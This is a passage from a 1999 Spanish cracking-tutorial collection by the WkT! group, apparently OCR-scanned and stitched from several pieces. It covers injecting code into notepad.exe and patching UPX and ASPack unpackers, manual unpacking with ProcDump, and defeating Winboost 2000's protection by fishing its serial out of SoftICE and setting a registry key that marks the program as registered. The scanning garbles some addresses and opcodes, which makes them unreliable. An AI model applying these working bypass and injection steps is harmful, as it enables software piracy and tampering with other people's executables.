en general (el segmento ".topo" tiene atributos de leible, escribible y ejecutable!). 


No os preocupeis si Winice o W32Dasm interpretan las variables así definidas como 
instrucciones de código inexistentes. Es normal. Intentan desensamblar lo 
inensamblable... 


Después escribimos los pushes, la llamada a MessageBox y dejamos el resto como 
está (una sucesión de NOPs hasta el JMP [original_entrypoint]. Copiamos con buena 
letra el código ensamblado resultante en un papelito y abandonamos Winice no sin 
antes haber borrado lo escrito restaurando los NOPs originales. 


Ahora hexeditamos (Uedit) el notepad.exe, nos vamos al offset donde comienza la 
sección ".topo" y tecleamos el churro de bytes. Cerramos y ejecutamos notepad 
obteniendo la ventana esperando confirmación para iniciar el "Bloc de Notas". 


En este ejemplo, el código añadido tiene este aspecto: 


[FAR ARIK KK KARA KK KAR Program Entry Point KKXXKXXXX* 
:0040C000 EB3B jmp 0040C03D ;--> 
salto hasta 


después de 


definir las 


"strings" 

¿Codigo inexistente... se trata de las strings: 
¿T=54h, o=6Fh, m=6Dh, a=61h, m=6Dh,...."Tomamos el 
Control” 

:0040C002 54 push esp 
:0040C003 6F outsd 


:0040C004 6D insd 


:0040C005 61 popad 


:0040C006 6D insd 

:0040C007 6F outsd 

:0040C008 7320 jnb 0040C02A 
:0040C00A 65 BYTE 065h 

:0040C00B 6€C insb 

:0040C00C 20636F and byte ptr [ebx+6F], 
ah 


; Una vez definidas las variables, comenza el código: 


:0040C03D 6A00 push 00000000 ; estilo 
0 

:0040C03F 682CC04000 push 0040C02C ; 
"MrCrimson says:" 

:0040C044 6802C04000 push 0040C002 ; 
"Tomamos el ctrl..." 

:0040C049 6A0O push 00000000 ; Padre 
0 


* Reference To: USER32.MessageBoxA 


:0040C04B FF1530744000 Call dword ptr 
[00407430] 

:0040C050 90 nop 

:0040C051 90 nop 

:0040C052 90 nop ; hasta 


completar 100 
:0040C05F E99C4FFFFF jmp 00401000 ; notepad 
normal 


La llamada a MessageBox parece un tanto misteriosa (offset :407430) pero los bytes 
que componen la instrucción pueden obtenerse fácilmente ensamblando desde 
Winice la linea: 


call dword ptr[MessageBoxA] 


NOTA: En la primera versión de este tute un descuido me llevo a codificar esta 
llamada mediante: 

[Winice (A)ssemble] call MessageBox 

El resultado era que funcionaba perfectamente en mi ordenador pero no en otros... 
Para que el enlace dinámico con la función en la dll (en este caso user32.dll) proceda 
correctamente, la llamada debe realizarse como se ha indicado. 


Una vez completado ejecutamos notepad y obtendremos una ventana con una mesaje 
chorra esperando un click en el OK para proseguir con el "bloc de notas". 


Este ejemplo ha mostrado como INCRUSTAR un trozo de código de -100 bytes 


donde aparentemente no cabría un alfiler. :0) 


ny 
Vi 
Ejemplo (2): Parcheador de Empaquetados Universal 


Por lo general, los empaquetadores/encriptadores de ficheros operan según una idea 
común. 

El código util está cifrado de manera que desensamblando no se puede analizar su 
comportamiento. En el momento de la ejecución entra en juego una rutina que 
escribe en memoria la versión no-encriptada y a partir de ese momento todo 
transcurre como si de un ejecutable normal se tratara. 

La forma de atacar a estos programas tan poco comunicativos se basa en cargadores 
o loaders. 

Un cargador es un programa capaz de cargar en memoria otros ejecutables y 
detenerse antes de comenzar su ejecución de manera que puede aprovecharse la 
ocasión para realizar los oportunos parcheos. Sin embargo son fáciles de engañar y 
tienen problemas para "seguir la pista" a nuevos threads (al menos los que he podido 
examinar). 


ToPo no tiene este tipo de problemas porque genera un "enemigo interior" que 
puede actuar justo después del desencriptado del código cualquiera que sea el 
algoritmo. Como ejemplo veremos como funciona con un par de empaquetadores de 
élite. 


(a) UPX v0.84 


Intentamos repetir la gracia anterior con una versión de Notepad.exe empaquetada 
con UPX. 
para ello tecleamos en la línea de comandos del DOS: 


C> upx -9 notepad.exe 
y ya está. Pfff....reducido a la mitad de tamaño!. Me encanta este packer :0) 


Ahora debemos añadir nuestra burbuja pero esta vez NO queremos redirección del 
entrypoint ya que este hace referencia al comienzo de la rutina de descompresión y 
no 

al código del notepad. 

Ok, tenemos el Notepad.exe, empaquetado con UPX e inoculado con una sección 
topo de 100 bytes (no necesitamos tantos en realidad...). Trazamos un poco para ver 
como respira el asunto poniendo un BPM en 401000 (el entrypoint original de 
notepad). Dejamos que fluya el código con E5 y... reaparecemos en :40C080. Se está 
escribiendo el código desempaquetado en su ubicación original... es decir que 
estamos en la rutina desempaquetadora. Trazamos un poco hacia el final para 
comprobar que la cosa acaba con un JMP al entrypoint del programa empaquetado 
(:401000). 

Esta rutina está perfectamente accesible por lo que desde UltraEdit modificamos el 
salto al inicio de nuestra sección ".topo" (JMP 40E000). 


A partir de aqui todo se reduce al caso anterior. Disponemos del código 
desempaquetado en memoria ANTES de comenzar la ejecución. Añadimos, como 
antes, nuestras "strings", los pushes y la llamada a messagebox (no copiar 
directamente porque las direcciones relativas no son las mismas). Por ultimo 
cerramos con un JMP al entrypoint de notepad :401000. 


(b) ASPack v1.08.03 


Este packer presenta algunas diferencias con el anterior. La compresión no es tan 
buena pero a cambio establece "potentes" medios de protección del código 
empaquetado. Siguiendo el ejmplo anterior intentaremos ejecutar nuestra lamer- 
splash al comienzo de la ejecución del notepad. 


Con las pautas ya explicadas (BPM a la primera instruccion del notepad, :401000) 
intentamos cazar el final de la rutina de descompresión para saltar desde allí a 
nuestra fortaleza de código en blanco. Y facilmente la encontramos en: 


:40C554 MOV [ESP+1C],EAX 

:40C558 POPAD 

:40C559 JNZ 40C563 

:40C55B MOV EAX, 1 

:40C560 RET 000€ 

:40C561 PUSH EAX 

:40C561 RET <------ Esto nos lleva al comienzo de 
"notepad" 


Cuando abrimos "notepad.exe” con Uedit para buscar este trozo de código 
descubrimos que NO ESTA. Impresionante. La rutina que desencripta esta también 
encriptada. 

No problemo. Buscaremos el código que desempaqueta al desempaquetador 
siguiendo la misma tecnica de los breakpoints en memoria. Así llegamos a: 


:40C0AE REPZ MOVSD 

:40C0B0 MOV ECX,EAX 

:40C0B2 AND ECX, 03 

:40C0B5 REPZ MOVSB <----- Copia el unpacker unpacked! 
:40C0B7 MOV EAX, [EBP+4450B5] 


Este código Sl esta accesible (bueno estaría que no) y perfectamente editable. 
Vamos pues con Uedit y modificamos la instrucción en :40C0b7 según: 


:40C0B7 JMP 40F000 <---salto a la sección ".topo" 


No debemos preocuparnos por las modificaciones que hacemos para acceder al 
".topo" porque antes de regresar restauraremos todo. 


Al comienzo del ".topo" codificamos lo siguiente (ayudandonos de (A)ssembly en 
Winice): 


¡Parcheamos el codigo en :40C554 por "3jmp 40f032" 
¡Es un salto a la mitad de la nueva sección donde 
¿pondremos nuestra messagebox 


:0040F000 mov dword ptr [0040C554], 002AD9E9 
:0040FO0OA mov byte ptr [0040C558], 00 


¡Restauramos el contenido en :40c0b7 a su 
¿código original "mov eax, [ebp+4450b5]" 


:0040F011 mov dword ptr [0040C0B7], 50B5858B 
:0040F01B mov word ptr [0040C0BB], 0044 


¿regresamos a :40c0b7 como si nada hubiera 
¡¿pasado... 


:0040F024 3jmp 0040C0B7 


Perdidos...? Recapitulemos: hemos parcheado con Uedit la rutina que desempaqueta 
al desempaquetador del codigo. El objeto del parche es establecer un acceso a 
"topo" que 

contendrá un nuevo parche en memoria. Este parche modifica el desempaquetador 
final para que salte de nuevo a ".topo" (hacia la mitad de la sección) ANTES de 
lanzar el Notepad. 

Creo que lo realmente lioso es intentar contarlo...hacerlo es muy fácil. 


La segunda mitad de ".topo" contiene el siguiente codigo más familiar: 


:0040F032 60 pushad ¿por 
seguridad 
:0040F033 EB3B jmp 0040F070 ¿saltamos 


las strings 


¿ strings usadas para la ventana messagebox 


:0040F035 54 push esp 

:0040F036 6F outsd 

:0040F037 6D insd 

:0040F069 7061 jo 0040FOCC 

:0040F06B 636B20 arpl dword ptr 
[ebx+20], ebp 

:0040F06E 2000 and byte ptr [eax], al 
:0040F070 6A00 push 00000000 ¡estilo 


0 


:0040F072 685FF04000 push 0040F05F ¡string 
titulo 


:0040F077 6835F04000 push 0040F035 ¿string 
mensaje 
:0040F07C 6A00 push 00000000 


¡Padre/Hwnd 


* Reference To: USER32.MessageBoxA 
:0040F07E FF1530744000 call dword ptr 
[00407430] 


¡¿Restauramos las instrucciones que habia antes del salto 
¡"40C554 mov [esp+1c],eax" 
¡"40C558 popad" 


:0040F084 C70554C540008944241C mov dword ptr 
[0040C554], 1C244489 


:0040F08E C60558C5400061 mov byte ptr 
[0040C558], 61 

:0040F095 61 popad 
:0040F096 E9BAD4FFFF jmp 0040C554 


Y así acaba esta historia. 
De manera muy similar se pueden parchear hasta la saciedad todos los 
packers/crypters. Al menos así ha sido con los que he probado. 


OS 
V 


La técnica ilustrada resuelve dos inconvenientes clásicos del Arte del Cracking. Por 
una parte la tradicional limitación de espacio que nos impide en ocasiones generar 
productos más creativos. Por otro lado se trata de una estrategia "en caliente" puesto 
que trabaja desde dentro del código como una parte más del programa original. 


Conclusión 


Como inconveniente citar el hecho de que cambia el tamaño de fichero y por tanto 
los clasicos parcheadores de diferencias no trabajarian con éxito. 
Un crack basado en esta técnica no sería un parcheador sino más bien un "inyector". 


Eso es todo por el momento. Este tutorial era originalmente más largo pero creo que 
con los ejemplos propuestos queda claro lo que se puede hacer con esta técnica. 
Espero que hayas pasado un buen rato leyendo este ladrillo. 


Los ejemplos de este tute están aquí (47kb): ejemplos.zip 
ToPo v1.0 esta disponible en http://i.am/MrCrimson 


Up The Hammer! 
MrCrimson/[WkT!99] 


Como usar el ProcDump para 
descomprimir/desencriptar tus cobayas 
By Mr. Orange (1999) 


0) Introduccion. 

1) Herramientas necesarias. 
2) Un vistazo al Procdump. 
3) Descompresión manual. 
4) Añadir un Script. 

5) Nota final. 


0) Introduccion. 


La intencion de este manual es enseñar como descomprimir nuestro 
objetivo cuando no hay un descompresor para el (o por lo menos no lo 
tenemos). 

Nuestra cobaya va a ser el CuentaPasos v3.75. 


1) Herramientas Necesarias. 


o SoftICE 
o ProcDump (Yo he usado la versión 1.5 Build 0 > 


2) Un vistazo al Procdump. 


ProcDump es una herramienta que te permite (entre otras cosas) copiar 
el contenido de un proceso al disco duro. También te permite editar la 
cabecera de los programas de tipo PE (Portable Executable). 


Veamos entonces como funciona... 

La ventana principal tiene 2 listas y 7 botones. La primera lista 
contiene los procesos que estas ejecutando en este momento, mientras 
que la segunda contiene los modulos que estan asociados a cada 
proceso. Los botones son: 


Unpack: Descomprime un ejecutable. Procdump es capaz de 
descomprimir algunos compresores. 

Rebuild PE: Reconstruye la cabecera de un ejecutable. 

PE Editor: Esta claro, no? Te permite editar la cabecera de un 
ejecutable. 

Bhrama Server: Ejecuta el Servidor Bhrama. Esto premite 
que otro programa (llamado cliente) se aproveche de las 
magnificas cualidades del ProcDump. 

Options: Para modificar alguna opción del programa. 
About: Muestra información del ProcDump. 

Quit: Salir del programa. 


Para más información, leete los *.TXT que vienen con el ProcDump 


¿Que utilidad tienen las listas? 
En la lista de procesos podemos realizar 3 operaciones que son 
accesibles a traves del botón derecho del ratón: 


Dump (FULL): Copia todo el contenido del proceso al disco 
duro. 

Dump (PATIAL): Copia el contenido del proceso al disco 
duro (solamente un rango). 

Kill Task: Termina un proceso. 

Process Infos: Muestra la cabecera del ejecutable. 

Refresh List: Actualiza la lista. 


Mientras que en la lista de modulos las opciones disponibles son: 


0) 


0) 


Dump (FULL): Copia todo el contenido del modulo al disco 
duro. 
Dump (PATIAL): Copia el contenido del modulo al disco 


duro (solamente un rango). 


3) Descompresión manual. 


OK!! Empecemos por analizer el fichero. Para ello he utilizado la magnifica 
herramienta Gettyp, y los resultados son: 


-= [cpasos32.exe] 
DOS executable file -— 334562 bytes 
Portable executable 


Found no known modifier or compiler. 


Calculated entrypoint: 


0011440Ah) 


Required CPU type: 


8714 / 0000220Ah 


80386 


Requires Win 95 or NT 4 


Flags: 


File is executable 
Line numbers stripped from file 
Local symbols stripped from file 
32 bit word machine 


Linker version: 


Objects 
Name 
.Ttext 
. data 
.idata 
.ISrc 
Oreloc 


.reloc 


4.20 


(object align 


Virt size 
000BD200h 
00017CA4h 
00000400h 
00030C00h 
0000A600h 
0000640Ah 
000000DCh 


= 00001000h): 


RVA 
00001000h 
000BFO00h 
000D7000h 
000D8000h 
00109000h 
00114000h 
0011B000h 


Found 318690 bytes overlay 
Absolute position: 


15872 of 334562 
Found archive at position 898 in overlay 


Phys size 
000BD200h 
00000000h 
00000200h 
00001800h 
0000A600h 
00001E00h 
00000200h 


next detection level 


RKive 1.92 archive 
Don't know how to list this type of archive :-( 


(= 4. 


(starting at 128 for 334434 bytes) 


(RVA: 


Phys Ofs 

00000000h 
00000000h 
00000400h 
00000600h 
00000000h 
00001E00h 
00003C00h 


1%) 


Segun parece, nuestro amigo esta comprimido. Pues tiene un Overlay de 318690 
bytes, y si nos fijamos, el programa entero ocupa 334562 bytes. 


¿Que es lo que sabemos hasta ahora? 

Que nuestro amigo esta comprimido, pero no es posible que se ejecute el codigo en 
ese estado, por lo que se debe descomprimir en memoria y luego ejecutarse. Asi 
pues lo primero que se debe hacer el programa es descomprimir el codigo y luego 
ejecutarlo. 


Sabiendo esto, cargemos a nuestra cobaya en el SoftICE y pongamos un 
breackpoint al principio del codigo: 


0051440A ; Subrout ine 
0051440A public start 
0051440A start proc near 


0051440A ¿mp  005144B5 


005144B5 mov eax, lesptarg_0] 
005144B9 and eax, 0051441B 


005144BF call 00514835 <-— Rutina de descompresion 
005144C4 inc 005144B4 

005144CA mp eax <-- Salto al programa ya 
descomprimido 


005144CA start endp 


Bien, ahora ya sbemos que es lo que hace el programa, pero ¿Como vamos a 
descomprimirlo? 

Pues muy sencillo, vamos a ejecutar el programa paso a paso hasta la linea 
005144CA. Justo ahi vamos a modificar una lineas de codigo, esi que introduce el 
comando a (para ensamblar), y escribe la siguiente linea: ¡mp eip 

Esto provocara que el programa quede en un bucle infinito en la linea 005144CA. 
Ahora es cuando debemos de ir al ProcDump y pulsar con el boton derecho sobre 
nuestra cobaya y elegir la opción Dump (FULL), y lo guardamos con el nombre 
que queramos. 

Bien, ahora ya tenemos el CuentaPasos descomprimido. Veamoslo, ejecutemoslo y 
BOOOMMM!!!! El programa no funciona, ¿porque? La respuesta es bien sencilla. 
Nosotros tenemos el programa descomprimido, pero el punto de entrada todavia es 
el de la rutina de descompresión. Debemos de combiarlo para que apunte al 
principio del codigo ya descomprimido. 

Bien, pero ¿como sabemos cual debe ser el nuevo punto de entrada? La respuesta la 
tenemos en la linea 005144CA, ahi hay un JMP EAX. Por lo que en EAX tenemos 
lo que buscamos. Nos apuntamos el valor de EAX (en mi caso 00401228) y 
volemos al ProcDump. 


En esta Ocasión, vamos a utilizar la opcion PE Editor, con la que podemos editar 
la cabecera del ejecutable (alli entre otras cosas esta el punto de entrada), y 
seleccionamos el archivo que hemos creado. Nos aparecera una ventana como esta: 


PE Structure Editor | 


— Header nfos e Structures. Editar 


Entry Poit : [00114404 Sections | Directory | 


Size of image : fo01 32000 apply changes method: 
í* Only to PE header 


Image Base: [00400000 || TOPEfe Cancel | 


Debemos de fijarnos en los cuadros de texto de Image Base (IB) y Entry Point 
(EP). El programa empieza a ejecutarse en IB+EP, por lo que sabiendo esto nos 
resultara fácil modificar la cabecera para que apunte a 00401228. Tan solo debemos 
poner en Entry Point 00401228 - Image Base = 00001228. Asi que pongamos 
00001228 en Entry Point y pulsemos OK. Prueba a ejecutar ahora el programa!! 
Bien, Funciona. Ahora ya tenemos el CuentaPasos descomprimido. xDD 


4) Añadir un Script. 


Vamos a añadir un Script al ProcDump para que sea capaz de 
descomprimir el CuentaPasos, asi que editemos el fichero script.ini del 
ProcDump para añadir una nueva entrada: 


P1A=PCGUARD v2.10 

P1B=Aspack108.3 

P1C=Shrinker 3.4 

P1D=CuentaPasos v3.75 <-- Entrada añadida 


[CuentaPasos v3.75] 
L1=LOOK FF,EO0 
L2=BP 

L3=STEP 


Realmente es bastante sencillo lo que hace este Script: La primera 
linea busca la secuencia de bytes FFEO que corresponden a los 


opcodes de JMP EAX, luego ponemos un BreackPoint y ejecutamos el 
progama paso a paso para gaurdarlo al disco duro. 

Sencillo, no? ¿Que conseguimos con esto? Pues es probable que en la 
proxima versión el autor utilice el mismo compresor, y nosotros tan 
solo tendremos que ejecutar el script para descomprimirlo. xDD 


5) Nota final. 


Bueno, esto es todo por hoy. Pero no queria terminar este articulo sin 
deciros que este metodo de compresion es realente muy sencillo (Si lo 
intentamos descomprimir con el metodo estandar que viene con el 
ProcDump, tambien tendremos exito :)) ). Pero mi intención era 
enseñar como hacer esto mismo manualmente y luego añadir un 
pequeño Script al ProcDump para ser capaces de descomprimir otros 
programas que emplean el mismo compresor. 


PD: Recordad que muchos compresores utilizan trucos antidebug y 
tambien es posible encontrarse otros que incluyan codigo 
antiSoftICE... :)) 

Como quitar la protección VBOX que tiene el Ulead Button.Applet 1.0 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Winboost 2000 v1.0.0.1999 | W9S / W98 / NT 


Winboost 2000 es un interesante programa que te permitirá personalizar tu windows. 

Entre sus multiples opciones destacan los trucos tipicos y cantidad de chorradas varias 
Descripción pero muy útiles. Por ejemplo hacerte un acceso directo en el escritorio para apagar el 

pe con un doble click. 

Y todo esto en un plis-plas. 


MA Mae ia 

Url a 
A 
[| Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas [Gettyp v2.38, ProcDump v1.5, W32dasm v8.93, UltraEdit v6.10a. 
| Objetivo [Obtención de un número de Serie Válido. 
NN 


Introducción 


Vamos a ver la protección que utiliza, ya que es realmente lo que más me interesa de 
este programa. Newbies: Seguimos avanzando :0) 

Mr.WhiTe ha vuelto con otro interesante tutorial bajo el brazo. 

En esta ocasión vamos a aprender unas cuantas cosillas: 


1. Cómo saber si un programa esta comprimido 

2. Uso del ProcDump 

3. Cómo eliminar una "protección anti-desensamblado" 
4. Y por supuesto, cómo cazar un bonito serial 


Por último pero no menos importante aprenderemos lo que no se debe hacer 
NUNCA al programar algo que pretendemos vender: Dejar las puertas 
abiertas. 


Primer susto 


Al abrir el programa nos aparece una ventana con el tipico mensaje: "This is an 
unlicensed copy.....etc", un botoncito con una cuenta atras y la leche. Que peligro. 
Ummm, hay una opción para introducir un Serial. Veamos si es más de lo mismo. 
:0( 

Ponemos un nombre y un fake serial, le damos al botoncito..... y NADA, no hay 
mensaje de error. Tsche!! ¿de que vas bitter-kas? , esto ya es algo mas interesante. 
(No te creas todo lo que te dice la gente, ya veras) 


Bueno, seguimos a ver por donde podemos atacar. Lo primero es lo primero: 
Desensamblamos el archivo WB2000.exe usando el W32dasm con la intención de 


echar un primer vistazo. aaaaaaaaahhhhhhhhh!!!! ¡Que miedo! No vemos nadaaaa 
mi 


uy uy, esto tiene muy mala pinta. Probamos esa dll sospechosa a ver.....(wb2000.dll) 
.... tsche!! nada!! tampoco hay nada visible. 


E. 
Vi 


Abrelatas! 


Esta joya tiene toda la pinta de estar comprimida. Como no tenemos ni idea de que compresor han 
utilizado para hacer un poco de magia, vamos a echar mano de un útil programita. Se trata del Gettyp. 
Este programa, disponible en http://w3.to/protools/ nos proporcionara toda la información necesaria 
para descomprimir correctamente el archivo. Vaya, parece ser que se trata del "ASPACK 1.083" 


¿GetTyp User Interface 1.06 - D:icrackingigettypforwm1... 


Filename: [F Awinboost2000_1.0.144B2000.exe 


- [F:1WINBOOST2000_1.0.111WB2000.exe] ----- 
DOS executable file - 681984 bytes 


Portable executable (starting at 256 for 681722 
Packer: ASpack 1.083 
Calculated entrypoint% 675328  O00A4E00Oh  ( 
Required CPU type: 80386 
Requires any version of MNin3Z 
Flags: 
File is executable 
Line mumbers stripped from file 
Local symbols stripped from file 


About... | ll Dptions... | Close | 


Estupendo, parece que ahora ya podemos echar mano del ProcDump para descomprimir el .exe y 
poder desensamblarlo. A ver si hay suerte hombre. :0) 

Abrimos el Procdump y seleccionamos Unpack, seleccionamos el compresor aspack 1.083 y le 
indicamos la ruta hasta nuestro WB2000.exe. Una vez cargado el Winboost, volvemos a la ventana del 
Procdump y si todo ha salido bien veremos una ventanita como esta: 


há 


ProcDump Request 


AN Please hit OK when task is loaded [check TaskBar] 


Pulsamos el boton y esperamos, esperamos..... esperamos....ahh, por fin nos sale una opcion para 
guardar el archivo descomprimido. Umm vamos a llamarlo WB2000ecd.exe mismamente. :0) Process 
succesfully unpacked!!! Estupendo. Vamos a probar ese WB2000ecd.exe a ver si funciona bien. Como 
la seda, pero sigue estando "unregistered” :0) jejeje. 


Ok, desensamblamos la octava maravilla y vamos a ver esas "String References”. Aaaaaaaaarggg2822 
!!! pero que pasa aqui??? 


Calma calamar. :0) 
Lo que sucede es que el programa tiene una protección anti Dasm que te acaba de acojonar. Newbie, 
tranquilo, toma un poco de aire y al ataque: 


Bien, despues de este estúpido inciso..... ¿cómo quitamos esa protección?. 
(Ya vas cargando otra vez el ProcDump) 


Pulsamos el boton Pe Editor y abrimos WB2000ecd.exe. Más botoncitos, pulsamos "Sections". Vaya 
una ventanita, para variar. :0) Pulsamos sobre "CODE" y le damos al boton derecho del raton. Nos sale 
un menu y seleccionamos "Edit section". Abajo, donde pone "Section Characteristics" vamos a 
modificar el valor CODOO040 por E0000020 , Pulsamos "ok", otra vez, otra vez y finalmente "EXIT". 
Desensamblamos.......... ¡1¡¡ BINGO!!! 


Ahora empieza lo interesante :0) 

Veamos, ¿por donde atacar? ¿recuerdas que no nos ha salido ningun mensaje de error al introducir 
nuestro fake serial?. Tsche!! "String References", ciertamente has acertado. Veamos si hay algo 
interesante que nos aproxime a nuestro ansiado Serial. 


Umm, encontramos una referencia a "Winboost 2000 has been registered succesfully" en :004C3325 


Si miramos un par de páginas hacia arriba nos encontraremos un monton de referencias a lo que 
parecen ser numeros de serie. ¿? Al llegar al final de los numeros vemos: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


|1:004C35C8 (0) 

| 

:004C3185 8B45F4 mov eax, dword ptr [ebp-0C] 
:004C3188 SB55FO mov edx, dword ptr [ebp-10] 
:004C318B ES900CF4FF call 00403E20 

:004C3196 8B45FO mov eax, dword r [ebp-10] 
:004C3199 BA30364Cc00 mov edx, 004C3630 

:004C319E ES?DOCF4FF call 00403E20 

:D004C3143 0FS840c010000 je 004C32B5 

:004C3149 S8B45FO mov eax, dword ptr [ebp-10] 


* Possible StringData Ref from Code 0bj ->"417478292" 


He puesto el cursor en el salto que nos evita llegar a todos esos numeros de serie. Fijate en esa call 
justo anterior. 

:004C318B CALL 00403E20 La seguimos a ver donde nos lleva. Tiene toda la pinta de ser la que 
comprueba nuestro serial. 


:00403E20 53 push ebx 
:00403E21 56 push esi 
:00403E22 57 push edi 
:D00403E23 82906 mov esi, eax 
:D00403E25 82D? mov edi, edx 


:00403E29 0FS48FO000000 je O0403EBE Ñ 


Efectivamente, Si cargamos el Softlce Podremos observar que en :00403E27 CMP EAX, EDX se 
compara nuestro fake serial (guardado en EAX) con el verdadero numero de serie (en EDX), con solo 
escribir "d edx" en el softice veremos nuestro ansiado Serial. 

Ahora te preguntaras..... ¿como hago para que el Softlce se pare justo ahi? Si no me sale mensaje de 
error ni nada!!! Pues muy sencillo. 


Pero esto no era Shareware? 


Cargamos el winboost con el softice. Escribimos nuestro nombre y fake serial (no pulses el boton 
todavia). Pulsamos control+d y ponemos un breakpoint en hmemcpy Tal que asi: "BPX HMEMCPY" 
volvemos al winboost y ahora si que pulsamos el boton. Boom!! aterrizamos en el softice, pulsamos 
FS, F11 Y vamos pulsando F12 varias veces hasta llegar al codigo del winboost. Una vez en el, 
ponemos el "BPX 00403E20" . Cerramos el winboost, volvemos a cargarlo y choff, aterrizamos en el 
Softlce, justo antes de entrar en la call. Pulsamos F8 para entrar e ir traceando hasta llegar a la CMP 
EAX, EDX. 

Y el resto ya lo sabes. ¿no? :0) Estas hecho un fiera!! ;0) 


Estupendo, borramos todos los breakpoints con "BC *" salimos del softice y metemos el nuevo serial. 
Heeeeeey!! estupendo, era ese. (Pues claro, que te creias? jeje). Salimos del winboost y esta vez lo 
abrimos pero con el exe original , con el comprimido. Mec, ventanita de REGISTRADO. :0). Si 
monitoreas un segundito con el "Regmonitor” podras observar la ABSOLUTA ESTUPIDEZ DE 
ESTA PROTECCION. Si, lamentable, realmente lamentable. Nos hemos tirado un buen rato 
analizando este programa ¿para estoooo?? 


NOTA Para la gente de www.magellas.com: 


Tanta compresión y protección anti desensamblador para estoooo?? 
Señores, seamos serios. 
Se han dejado ustedes la puerta de atras completamente abierta!!!! 


Registro de Windows --STOP-- Imbecilidad Absoluta --STOP-- Para protegerlo asi mejor regalarlo -- 
STOP-- Aprendan Ingenieria Inversa y algo más --STOP-- 


[HKEY_LOCAL MACHINEANSoftwarelMagellassMWinBoost 2000] 
"Registered"="True" 


Siiiiii !!!! Acojonante!!! 

Todo el mecanismo de registro depende de si el programa encuentra esa 
clave en el registro. 

"Registered"="True" <---- Ni siquiera comprueba su valor, solamente 
que exista !!!!! 


Creo que no hace falta que te recuerde el propósito de estos 
tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede 
ser que el autor se haya saltado la explicación de algún paso, 
errores en las direcciones de memoria...... etc). 

El objetivo es que aprendas a crackear y que tengas ideas propias. 
70) 


ii ======= A PERSONAL GREETZ *-+-*-*-=o====== Erri 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 

Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 

JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 


FAQ 1 WKT Tutorialz Site | FAQ 2 


Introducción 


Estas leyendo la FAQ Oficial de [Wk'T'!]. Este proyecto fue iniciado en su momento 
(1997) por Mr.Red [WkT!], y ahora volvemos a reabrirlo para deleite de todos 
nuestros lectores. La versión inglesa aún no esta disponible, y es posible que nunca 
llegue a ver la luz. A no ser que algún alma caritativa se ofrezca voluntaria a iniciar 
la traducción. Algún voluntario??? 

Si es así, por favor envianos un e-mail. 


Si tus dudas aún no están resueltas en esta FAQ, [WkT!] te recomienda que te pases 
por la Web de Gerza, donde encontrarás la FAQ Oficial del "Spanish 


ReverseEngineering Forum". 


Si alli tampoco encuentras lo que buscas, utiliza ese foro. 


¿Cual es el objetivo de [WkT!]? ¿Por que un grupo de crackers hispano? 
¿Qué es el Cracking? 

¿Qué es un debugger? 

¿Qué es un desensamblador? 

¿Qué es un editor hexadecimal? 

¿Todos los programas se desprotegen de la misma forma? 


¿Qué diferencias hay entre programas hechos en Visual C++ y Visual Basic? 
¿Cómo saber si un programa esta hecho en Visual Basic? 
¿Qué es una DLL? 


Pongo un break point en Winice y nunca para el programa en él 
Cuando paro un programa con Ctrl+D en Winice me aparece el listado en una zona llamada KERNEL32 


¿Cual es el objetivo de [WkT!]? ¿Por que un grupo de crackers hispano? 


Desde sus orígenes, el objetivo de Whiskey Kon Tekila ha sido, es y será siempre proporcionar información. Por 

iversos motivos (principalmente económicos) la Ingeniería Inversa siempre se ha considerado un tema "tabú" en 
d t (p palment ) la Ing I p h derad t "tabú" 
la Informática. Y como tal, el desconocimiento técnico en este sentido ha sido notable. 


(Al menos en el mundo hispano hablante). 


[WkT!] surge como un grupo de gente apasionada por la programación de protecciones hardware/software, con 
el único propósito de ampliar su conocimiento y el de cualquier otra persona interesada al respecto. Los 
programadores de aplicaciones comerciales suelen actuar con una cierta indiferencia cuando se trata de 
programar la protección de su software. Quizá sería más correcto afirmar que más que indiferencia se trata de 
inconsciencia. Desconocimiento, en definitiva, de las técnicas empleadas desde "el otro lado". 


Es por esto que estas páginas constituyen (o eso se pretende) un punto de referencia para todo aquel programador 
realmente interesado en ampliar sus conocimientos y adaptarlos a los nuevos tiempos. 

[WkT!] es consciente de que la información proporcionada en su Web Site puede llegar a ser un "arma de doble 
filo", puesto que nada impide el posible mal uso de esa información por parte de nuestros lectores. Ante esto 
cabría plantearse unas cuantas cuestiones: 


e ¿Hasta donde llega el conocimiento sobre Ingenieria Inversa del programador hispano? 
Cuando un programador desarrolla una protección.... ¿es consciente de sus limitaciones? 
¿Sabe cómo buscar sus puntos débiles? ¿Quiere realmente ELIMINAR esos puntos débiles? 

e El problema de la piratería de software .... ¿Es acaso una consecuencia de la sociedad consumista actual? 
¿0 se debe en mayor medida a los elevados precios del mismo? 

e ¿Por qué algunos de los mejores y tambien más caros programas son al mismo tiempo los que peores 
protecciones incorporan? ¿Hasta que punto preocupa la protección de su software a las grandes 
compañias? 

e Cuando alguien utiliza un crack... ¿Es porque quiere evaluarlo mejor antes de comprarlo? 

¿Lo hace porque no puede pagar el programa en cuestión? 
¿Lo hace porque no quiere pagarlo? Si es así.... ¿es consciente del daño que puede ocasionar? 

e Realmente, ¿Que deberia estar más sujeto a una "persecución social”? 

¿El uso ilegal de un programa o la programación / administración inadecuada e insegura del Software? 


Quizá estas sean algunas de las cuestiones más polémicas, pero que en definitiva nos hacen reflexionar a todos si 
el estudio de la Ingenieria Inversa deberia dejar de ser considerado como algo dañino e inapropiado para ser más 
tenido en cuenta a la hora de programar una aplicación comercial. Y es que, en definitiva, el mejor modo de 
avanzar en el conocimiento es investigar y para ello el primer paso es conocer nuestro propio software. Espero 
que esto te haya aclarado un poco la situación. De todas formas, gracias por haberlo leido. 

Un saludo. Mr.WhiTe [WkT!] 


|¿Qué es el Cracking? 


No tiene nada que ver con las drogras...(el famoso Crack) : ( 


"Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, personales pero no 
lucrativos. Crackear también se llama "ingeniería inversa" (Reverse Engineering), ya que sin el programa fuente 
